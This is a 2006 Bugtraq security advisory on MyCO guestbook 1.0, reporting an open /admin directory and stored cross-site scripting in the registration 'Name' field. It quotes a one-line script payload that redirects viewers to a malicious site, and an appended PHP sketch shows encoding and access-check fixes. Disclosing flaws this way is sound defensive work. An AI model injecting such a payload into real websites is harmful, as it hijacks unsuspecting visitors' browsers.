Bugtraq mailing list archives
MyCO multiple vulnerabilities
From: revnic () gmail com
Date: 31 Jan 2006 08:07:31 -0000
MyCO multiple vulnerabilities

Software: MyCO guestbook 1.0
www.punctweb.com

Credit: Revnic Vasile
revnic () gmail com

Description: MyCO is a PHP guestbook that uses a MySQL database.

Vulnerability: the /admin directory is accessible by everyone.
XSS can be injected into the field "Name" when registering a new user.
<script>document.location = 'http://some.site/crash_ie.asp';</script>
when viewing members list can redirect user's browser to a malicious site.
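Added example, not part of the original advisory and not MyCO's own code: a sketch of how a PHP guestbook can close both reported issues, by encoding the stored "Name" value when the members list is rendered and by refusing /admin scripts without an authenticated session. The function names, the `is_admin` session key, the 64-byte name limit and the row layout are all assumptions.

```php
<?php
// Added example: hypothetical helpers, not MyCO's own code.
// Encode a stored value for HTML body and quoted-attribute contexts.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Registration check (defense in depth; output encoding is the actual fix).
function validate_name(string $name): bool
{
    $name = trim($name);
    if ($name === '' || strlen($name) > 64) {   // 64 is an assumed limit
        return false;
    }
    return preg_match('/[<>\x00-\x1F\x7F]/', $name) !== 1;
}

// Members list: every stored name passes through h() before it is emitted.
function render_members(array $rows): string
{
    $html = "<ul>\n";
    foreach ($rows as $row) {
        $html .= '  <li>' . h($row['name']) . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Call first in every script under /admin (assumes a login sets is_admin).
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['is_admin'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Constructed sample rows; the second name is the payload quoted in the advisory.
$rows = [
    ['name' => 'alice'],
    ['name' => "<script>document.location = 'http://some.site/crash_ie.asp';</script>"],
];
echo render_members($rows);
foreach ($rows as $row) {
    echo validate_name($row['name']) ? "accept\n" : "reject\n";
}
```

Names already stored before such a fix are still rendered safely, because the encoding happens at output time rather than only at registration.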